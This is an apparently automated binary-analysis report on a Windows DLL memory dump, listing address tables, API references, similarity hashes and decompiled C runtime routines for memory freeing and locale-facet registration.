0x6de288cc
0x6de288ce
0x6de288d0
0x00000000
0x00000000
0x6de288c7
0x6de288c9
0x6de288cb
0x6de288cb
0x00000000
0x6de288cb
0x00000000
0x6de288c9
0x6de288d2
0x6de288d5
0x6de288d7
0x6de288e2
0x6de288e4
0x6de288ee
0x6de288ee
0x6de288f0
0x6de288f2
0x00000000
0x00000000
0x6de288e9
0x6de288eb
0x6de288ed
0x6de288ed
0x00000000
0x6de288ed
0x00000000
0x6de288eb
0x6de288ee
0x6de288d5
0x6de288f4
0x6de288f4
0x6de288f6
0x6de288fa
0x6de288fa
0x6de288ff
0x6de28901
0x6de28904
0x6de28907
0x6de28909
0x6de2890c
0x6de28924
0x6de28927
0x6de2892a
0x6de28932
0x6de28937
0x6de2893c
0x00000000
0x6de2893c
0x6de2890e
0x6de28913
0x6de28916
0x6de2891b
0x6de2891e
0x6de28920
0x00000000
0x00000000
0x6de28922
0x6de2886f
0x00000000
0x6de28856
0x6de287c9
0x6de287c9
0x6de287cb
0x6de287cd
0x6de287cd
0x6de287d1
0x00000000
0x00000000
0x6de287d5
0x6de287e9
0x6de287e9
0x6de287d7
0x6de287d7
0x6de287d7
0x6de287dd
0x00000000
0x6de287df
0x6de287df
0x6de287e2
0x6de287e7
0x00000000
0x00000000
0x00000000
0x00000000
0x6de287e7
0x6de287dd
0x6de287f2
0x6de287f4
0x6de28943
0x6de28943
0x6de287fa
0x6de287fa
0x00000000
0x6de287fa
0x00000000
0x6de287f4
0x6de287ed
0x6de287ef
0x6de287ef
0x00000000
0x6de287ef
0x6de287c7
0x00000000

APIs

_free.LIBCMT ref: 6DE287FE
_free.LIBCMT ref: 6DE28822
_free.LIBCMT ref: 6DE289A9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6DE42130), ref: 6DE289BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6DE28A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A70,000000FF,?,0000003F,00000000,?), ref: 6DE28A60
_free.LIBCMT ref: 6DE28B75

Strings

0!m, xrefs: 6DE28AD8
0!m, xrefs: 6DE28964, 6DE2896A

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!m$0!m
API String ID: 314583886-1395855498
Opcode ID: e3ea0460d07a24632ceada4fad728410db542455266b7e12eabd1fd616b28ed8
Instruction ID: 6c0ac9293a12044febf22a318ea25a186f8d35227dc3de8f94cf8bdc56e01876
Opcode Fuzzy Hash: e3ea0460d07a24632ceada4fad728410db542455266b7e12eabd1fd616b28ed8
Instruction Fuzzy Hash: E7C11872A08646ABDB15DF68CCC0BBA7BB9EF42318F35459ED594AB340EF309A41C750

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1D3EF, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE1D3EF(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6de40c10) {
					E6DE1CBD3(_t52);
					_t26 = _a4;
				}
				E6DE1CBD3( *((intOrPtr*)(_t26 + 0x3c)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x30)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x34)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x38)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x28)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x2c)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x40)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x44)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6DE1D23E(5,  &_v8);
				_v8 =  &_a4;
				return E6DE1D28E(4,  &_v8);
			}

0x6de1d3f5
0x6de1d3f8
0x6de1d400
0x6de1d403
0x6de1d408
0x6de1d40b
0x6de1d40f
0x6de1d41a
0x6de1d425
0x6de1d430
0x6de1d43b
0x6de1d446
0x6de1d451
0x6de1d45c
0x6de1d46a
0x6de1d472
0x6de1d47b
0x6de1d483
0x6de1d497

APIs

_free.LIBCMT ref: 6DE1D403

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

_free.LIBCMT ref: 6DE1D40F
_free.LIBCMT ref: 6DE1D41A
_free.LIBCMT ref: 6DE1D425
_free.LIBCMT ref: 6DE1D430
_free.LIBCMT ref: 6DE1D43B
_free.LIBCMT ref: 6DE1D446
_free.LIBCMT ref: 6DE1D451
_free.LIBCMT ref: 6DE1D45C
_free.LIBCMT ref: 6DE1D46A

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 282e8f461a055616628fc03499b5de85ea263430c2ef734941c22ca926dc9e16
Instruction ID: d9edc1809316870a3ed422901aa4486066c6c3ea266e4efc7386ebba4b5d0681
Opcode Fuzzy Hash: 282e8f461a055616628fc03499b5de85ea263430c2ef734941c22ca926dc9e16
Instruction Fuzzy Hash: 8C11967574D10CAFCB01DF54CC41DEA7BB5EF0465CB2244A9BA08CF222DB75EA609B80

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD777F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDD777F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t19;
				intOrPtr* _t20;
				intOrPtr* _t42;
				void* _t50;

				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653( &_v20, 0);
				_t50 =  *0x6de96c10; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t50;
				_t19 = E6DDB161C(0x6de96b2c);
				_t38 = _a8;
				_t20 = E6DDB171B(_a8, _t19);
				_t48 = _t20;
				if(_t20 != 0) {
					L5:
					E6DDD66BA( &_v20);
					return E6DDF0075(_t48);
				} else {
					if(_t50 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6DDD7E4C(__ebx, _t38, __edx, _t48, _t50) - 0xffffffff;
						if(__eflags == 0) {
							_t42 =  &_v32;
							E6DDB1438(_t42);
							E6DDF3D74( &_v32, 0x6de93504);
							asm("int3");
							 *_t42 = _v0;
							return _t42;
						} else {
							_t48 = _v16;
							_v16 = _t48;
							_v4 = 1;
							E6DDD6FD3(__eflags, _t48);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t48 + 4))))();
							 *0x6de96c10 = _t48;
							goto L5;
						}
					} else {
						_t48 = _t50;
						goto L5;
					}
				}
			}

0x6ddd7786
0x6ddd7790
0x6ddd7795
0x6ddd77a0
0x6ddd77a4
0x6ddd77a7
0x6ddd77ac
0x6ddd77b0
0x6ddd77b5
0x6ddd77b9
0x6ddd77fe
0x6ddd7801
0x6ddd780d
0x6ddd77bb
0x6ddd77bd
0x6ddd77c3
0x6ddd77c9
0x6ddd77d1
0x6ddd77d4
0x6ddd780e
0x6ddd7811
0x6ddd781f
0x6ddd7824
0x6ddd782b
0x6ddd7830
0x6ddd77d6
0x6ddd77d6
0x6ddd77d9
0x6ddd77dd
0x6ddd77e1
0x6ddd77ee
0x6ddd77f6
0x6ddd77f8
0x00000000
0x6ddd77f8
0x6ddd77bf
0x6ddd77bf
0x00000000
0x6ddd77bf
0x6ddd77bd

APIs

__EH_prolog3.LIBCMT ref: 6DDD7786
std::_Lockit::_Lockit.LIBCPMT ref: 6DDD7790
int.LIBCPMT ref: 6DDD77A7

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

codecvt.LIBCPMT ref: 6DDD77CA
std::_Facet_Register.LIBCPMT ref: 6DDD77E1
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD7801
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD781F

Strings

,km, xrefs: 6DDD779B

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: ,km
API String ID: 2594415655-221775841
Opcode ID: a7ebba5eeb919b8d978ed161998b363207f0859abccb9604b15745a8e7b1d8f0
Instruction ID: 02b8303f6611af074d1def079d5f5471ae2eb880c7707a0a31c82de0fb6d1ee1
Opcode Fuzzy Hash: a7ebba5eeb919b8d978ed161998b363207f0859abccb9604b15745a8e7b1d8f0
Instruction Fuzzy Hash: 5211E275D08219FBCF01FBA4C840ABEB7B5AF44718F220449F511AB290DFB0AA05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDEEEB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDEEEB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t321;
				signed int _t322;
				void* _t334;
				void* _t347;
				void* _t360;
				void* _t373;
				void* _t386;
				void* _t399;
				void* _t412;
				void* _t425;
				void* _t438;
				void* _t451;
				void* _t464;
				void* _t477;
				void* _t490;
				void* _t503;
				void* _t516;
				void* _t529;
				void* _t542;
				void* _t555;
				void* _t568;
				void* _t581;
				void* _t594;
				signed int _t853;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				void* _t990;

				_t920 = __edx;
				_t699 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t990 - 0x14, 0);
				_t945 =  *0x6de96e04; // 0x0
				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
				 *(_t990 - 0x10) = _t945;
				_t321 = E6DDB161C(0x6de96b30);
				_t702 =  *((intOrPtr*)(_t990 + 8));
				_t322 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t321);
				_t922 = _t322;
				if(_t322 != 0) {
					L5:
					E6DDD66BA(_t990 - 0x14);
					return E6DDF0075(_t922);
				} else {
					if(_t945 == 0) {
						_push( *((intOrPtr*)(_t990 + 8)));
						_push(_t990 - 0x10);
						__eflags = E6DDE0C9D(__ebx, _t702, __edx, _t922, _t945) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t990 - 0x20);
							E6DDF3D74(_t990 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t922, _t945, 0x14);
							E6DDD6653(_t990 - 0x14, 0);
							_t946 =  *0x6de96de4; // 0x0
							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
							 *(_t990 - 0x10) = _t946;
							_t334 = E6DDB161C(0x6de96d90);
							_t709 =  *((intOrPtr*)(_t990 + 8));
							_t923 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t334);
							__eflags = _t923;
							if(_t923 != 0) {
								L12:
								E6DDD66BA(_t990 - 0x14);
								return E6DDF0075(_t923);
							} else {
								__eflags = _t946;
								if(_t946 == 0) {
									_push( *((intOrPtr*)(_t990 + 8)));
									_push(_t990 - 0x10);
									__eflags = E6DDE0D03(_t699, _t709, __edx, _t923, _t946) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t990 - 0x20);
										E6DDF3D74(_t990 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t699, _t923, _t946, 0x14);
										E6DDD6653(_t990 - 0x14, 0);
										_t947 =  *0x6de96db4; // 0x0
										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
										 *(_t990 - 0x10) = _t947;
										_t347 = E6DDB161C(0x6de96d68);
										_t716 =  *((intOrPtr*)(_t990 + 8));
										_t924 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t347);
										__eflags = _t924;
										if(_t924 != 0) {
											L19:
											E6DDD66BA(_t990 - 0x14);
											return E6DDF0075(_t924);
										} else {
											__eflags = _t947;
											if(_t947 == 0) {
												_push( *((intOrPtr*)(_t990 + 8)));
												_push(_t990 - 0x10);
												__eflags = E6DDE0DA5(_t699, _t716, __edx, _t924, _t947) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t990 - 0x20);
													E6DDF3D74(_t990 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t699, _t924, _t947, 0x14);
													E6DDD6653(_t990 - 0x14, 0);
													_t948 =  *0x6de96dd4; // 0x0
													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
													 *(_t990 - 0x10) = _t948;
													_t360 = E6DDB161C(0x6de96b28);
													_t723 =  *((intOrPtr*)(_t990 + 8));
													_t925 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t360);
													__eflags = _t925;
													if(_t925 != 0) {
														L26:
														E6DDD66BA(_t990 - 0x14);
														return E6DDF0075(_t925);
													} else {
														__eflags = _t948;
														if(_t948 == 0) {
															_push( *((intOrPtr*)(_t990 + 8)));
															_push(_t990 - 0x10);
															__eflags = E6DDE0E47(_t699, _t723, _t920, _t925, _t948) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t990 - 0x20);
																E6DDF3D74(_t990 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t699, _t925, _t948, 0x14);
																E6DDD6653(_t990 - 0x14, 0);
																_t949 =  *0x6de96de8; // 0x0
																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																 *(_t990 - 0x10) = _t949;
																_t373 = E6DDB161C(0x6de96d94);
																_t730 =  *((intOrPtr*)(_t990 + 8));
																_t926 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t373);
																__eflags = _t926;
																if(_t926 != 0) {
																	L33:
																	E6DDD66BA(_t990 - 0x14);
																	return E6DDF0075(_t926);
																} else {
																	__eflags = _t949;
																	if(_t949 == 0) {
																		_push( *((intOrPtr*)(_t990 + 8)));
																		_push(_t990 - 0x10);
																		__eflags = E6DDE0EB7(_t699, _t730, _t920, _t926, _t949) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t990 - 0x20);
																			E6DDF3D74(_t990 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t699, _t926, _t949, 0x14);
																			E6DDD6653(_t990 - 0x14, 0);
																			_t950 =  *0x6de96db8; // 0x0
																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																			 *(_t990 - 0x10) = _t950;
																			_t386 = E6DDB161C(0x6de96d6c);
																			_t737 =  *((intOrPtr*)(_t990 + 8));
																			_t927 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t386);
																			__eflags = _t927;
																			if(_t927 != 0) {
																				L40:
																				E6DDD66BA(_t990 - 0x14);
																				return E6DDF0075(_t927);
																			} else {
																				__eflags = _t950;
																				if(_t950 == 0) {
																					_push( *((intOrPtr*)(_t990 + 8)));
																					_push(_t990 - 0x10);
																					__eflags = E6DDE0F1F(_t699, _t737, _t920, _t927, _t950) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t990 - 0x20);
																						E6DDF3D74(_t990 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t699, _t927, _t950, 0x14);
																						E6DDD6653(_t990 - 0x14, 0);
																						_t951 =  *0x6de96dec; // 0x0
																						 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																						 *(_t990 - 0x10) = _t951;
																						_t399 = E6DDB161C(0x6de96d98);
																						_t744 =  *((intOrPtr*)(_t990 + 8));
																						_t928 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t399);
																						__eflags = _t928;
																						if(_t928 != 0) {
																							L47:
																							E6DDD66BA(_t990 - 0x14);
																							return E6DDF0075(_t928);
																						} else {
																							__eflags = _t951;
																							if(_t951 == 0) {
																								_push( *((intOrPtr*)(_t990 + 8)));
																								_push(_t990 - 0x10);
																								__eflags = E6DDE0F87(_t699, _t744, _t920, _t928, _t951) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t990 - 0x20);
																									E6DDF3D74(_t990 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t699, _t928, _t951, 0x14);
																									E6DDD6653(_t990 - 0x14, 0);
																									_t952 =  *0x6de96dbc; // 0x0
																									 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																									 *(_t990 - 0x10) = _t952;
																									_t412 = E6DDB161C(0x6de96d70);
																									_t751 =  *((intOrPtr*)(_t990 + 8));
																									_t929 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t412);
																									__eflags = _t929;
																									if(_t929 != 0) {
																										L54:
																										E6DDD66BA(_t990 - 0x14);
																										return E6DDF0075(_t929);
																									} else {
																										__eflags = _t952;
																										if(_t952 == 0) {
																											_push( *((intOrPtr*)(_t990 + 8)));
																											_push(_t990 - 0x10);
																											__eflags = E6DDE0FEF(_t699, _t751, _t920, _t929, _t952) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t990 - 0x20);
																												E6DDF3D74(_t990 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t699, _t929, _t952, 0x14);
																												E6DDD6653(_t990 - 0x14, 0);
																												_t953 =  *0x6de96df0; // 0x0
																												 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																												 *(_t990 - 0x10) = _t953;
																												_t425 = E6DDB161C(0x6de96d9c);
																												_t758 =  *((intOrPtr*)(_t990 + 8));
																												_t930 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t425);
																												__eflags = _t930;
																												if(_t930 != 0) {
																													L61:
																													E6DDD66BA(_t990 - 0x14);
																													return E6DDF0075(_t930);
																												} else {
																													__eflags = _t953;
																													if(_t953 == 0) {
																														_push( *((intOrPtr*)(_t990 + 8)));
																														_push(_t990 - 0x10);
																														__eflags = E6DDE1057(_t699, _t758, _t920, _t930, _t953) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t990 - 0x20);
																															E6DDF3D74(_t990 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t699, _t930, _t953, 0x14);
																															E6DDD6653(_t990 - 0x14, 0);
																															_t954 =  *0x6de96dc0; // 0x0
																															 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																															 *(_t990 - 0x10) = _t954;
																															_t438 = E6DDB161C(0x6de96d74);
																															_t765 =  *((intOrPtr*)(_t990 + 8));
																															_t931 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t438);
																															__eflags = _t931;
																															if(_t931 != 0) {
																																L68:
																																E6DDD66BA(_t990 - 0x14);
																																return E6DDF0075(_t931);
																															} else {
																																__eflags = _t954;
																																if(_t954 == 0) {
																																	_push( *((intOrPtr*)(_t990 + 8)));
																																	_push(_t990 - 0x10);
																																	__eflags = E6DDE10BF(_t699, _t765, _t920, _t931, _t954) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t990 - 0x20);
																																		E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t699, _t931, _t954, 0x14);
																																		E6DDD6653(_t990 - 0x14, 0);
																																		_t955 =  *0x6de96df8; // 0x0
																																		 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																		 *(_t990 - 0x10) = _t955;
																																		_t451 = E6DDB161C(0x6de96da4);
																																		_t772 =  *((intOrPtr*)(_t990 + 8));
																																		_t932 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t451);
																																		__eflags = _t932;
																																		if(_t932 != 0) {
																																			L75:
																																			E6DDD66BA(_t990 - 0x14);
																																			return E6DDF0075(_t932);
																																		} else {
																																			__eflags = _t955;
																																			if(_t955 == 0) {
																																				_push( *((intOrPtr*)(_t990 + 8)));
																																				_push(_t990 - 0x10);
																																				__eflags = E6DDE1127(_t699, _t772, _t920, _t932, _t955) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t990 - 0x20);
																																					E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t699, _t932, _t955, 0x14);
																																					E6DDD6653(_t990 - 0x14, 0);
																																					_t956 =  *0x6de96df4; // 0x0
																																					 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																					 *(_t990 - 0x10) = _t956;
																																					_t464 = E6DDB161C(0x6de96da0);
																																					_t779 =  *((intOrPtr*)(_t990 + 8));
																																					_t933 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t464);
																																					__eflags = _t933;
																																					if(_t933 != 0) {
																																						L82:
																																						E6DDD66BA(_t990 - 0x14);
																																						return E6DDF0075(_t933);
																																					} else {
																																						__eflags = _t956;
																																						if(_t956 == 0) {
																																							_push( *((intOrPtr*)(_t990 + 8)));
																																							_push(_t990 - 0x10);
																																							__eflags = E6DDE11AB(_t699, _t779, _t920, _t933, _t956) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t990 - 0x20);
																																								E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t699, _t933, _t956, 0x14);
																																								E6DDD6653(_t990 - 0x14, 0);
																																								_t957 =  *0x6de96dc8; // 0x0
																																								 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																								 *(_t990 - 0x10) = _t957;
																																								_t477 = E6DDB161C(0x6de96d7c);
																																								_t786 =  *((intOrPtr*)(_t990 + 8));
																																								_t934 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t477);
																																								__eflags = _t934;
																																								if(_t934 != 0) {
																																									L89:
																																									E6DDD66BA(_t990 - 0x14);
																																									return E6DDF0075(_t934);
																																								} else {
																																									__eflags = _t957;
																																									if(_t957 == 0) {
																																										_push( *((intOrPtr*)(_t990 + 8)));
																																										_push(_t990 - 0x10);
																																										__eflags = E6DDE1230(_t699, _t786, _t920, _t934, _t957) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t990 - 0x20);
																																											E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t699, _t934, _t957, 0x14);
																																											E6DDD6653(_t990 - 0x14, 0);
																																											_t958 =  *0x6de96dc4; // 0x0
																																											 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																											 *(_t990 - 0x10) = _t958;
																																											_t490 = E6DDB161C(0x6de96d78);
																																											_t793 =  *((intOrPtr*)(_t990 + 8));
																																											_t935 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t490);
																																											__eflags = _t935;
																																											if(_t935 != 0) {
																																												L96:
																																												E6DDD66BA(_t990 - 0x14);
																																												return E6DDF0075(_t935);
																																											} else {
																																												__eflags = _t958;
																																												if(_t958 == 0) {
																																													_push( *((intOrPtr*)(_t990 + 8)));
																																													_push(_t990 - 0x10);
																																													__eflags = E6DDE12B4(_t699, _t793, _t920, _t935, _t958) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t990 - 0x20);
																																														E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t699, _t935, _t958, 0x14);
																																														E6DDD6653(_t990 - 0x14, 0);
																																														_t959 =  *0x6de96dd8; // 0x0
																																														 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																														 *(_t990 - 0x10) = _t959;
																																														_t503 = E6DDB161C(0x6de96d84);
																																														_t800 =  *((intOrPtr*)(_t990 + 8));
																																														_t936 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t503);
																																														__eflags = _t936;
																																														if(_t936 != 0) {
																																															L103:
																																															E6DDD66BA(_t990 - 0x14);
																																															return E6DDF0075(_t936);
																																														} else {
																																															__eflags = _t959;
																																															if(_t959 == 0) {
																																																_push( *((intOrPtr*)(_t990 + 8)));
																																																_push(_t990 - 0x10);
																																																__eflags = E6DDE1339(_t699, _t800, _t920, _t936, _t959) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t990 - 0x20);
																																																	E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t699, _t936, _t959, 0x14);
																																																	E6DDD6653(_t990 - 0x14, 0);
																																																	_t960 =  *0x6de96db0; // 0x0
																																																	 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																	 *(_t990 - 0x10) = _t960;
																																																	_t516 = E6DDB161C(0x6de96d64);
																																																	_t807 =  *((intOrPtr*)(_t990 + 8));
																																																	_t937 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t516);
																																																	__eflags = _t937;
																																																	if(_t937 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t990 - 0x14);
																																																		return E6DDF0075(_t937);
																																																	} else {
																																																		__eflags = _t960;
																																																		if(_t960 == 0) {
																																																			_push( *((intOrPtr*)(_t990 + 8)));
																																																			_push(_t990 - 0x10);
																																																			__eflags = E6DDE13A1(_t699, _t807, _t920, _t937, _t960) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6DDB1438(_t990 - 0x20);
																																																				E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de383cf, _t699, _t937, _t960, 0x14);
																																																				E6DDD6653(_t990 - 0x14, 0);
																																																				_t961 =  *0x6de96ddc; // 0x0
																																																				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																				 *(_t990 - 0x10) = _t961;
																																																				_t529 = E6DDB161C(0x6de96d88);
																																																				_t814 =  *((intOrPtr*)(_t990 + 8));
																																																				_t938 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t529);
																																																				__eflags = _t938;
																																																				if(_t938 != 0) {
																																																					L117:
																																																					E6DDD66BA(_t990 - 0x14);
																																																					return E6DDF0075(_t938);
																																																				} else {
																																																					__eflags = _t961;
																																																					if(_t961 == 0) {
																																																						_push( *((intOrPtr*)(_t990 + 8)));
																																																						_push(_t990 - 0x10);
																																																						__eflags = E6DDE1409(_t699, _t814, _t920, _t938, _t961) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6DDB1438(_t990 - 0x20);
																																																							E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																							asm("int3");
																																																							E6DDF00AC(0x6de383cf, _t699, _t938, _t961, 0x14);
																																																							E6DDD6653(_t990 - 0x14, 0);
																																																							_t962 =  *0x6de96de0; // 0x0
																																																							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																							 *(_t990 - 0x10) = _t962;
																																																							_t542 = E6DDB161C(0x6de96d8c);
																																																							_t821 =  *((intOrPtr*)(_t990 + 8));
																																																							_t939 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t542);
																																																							__eflags = _t939;
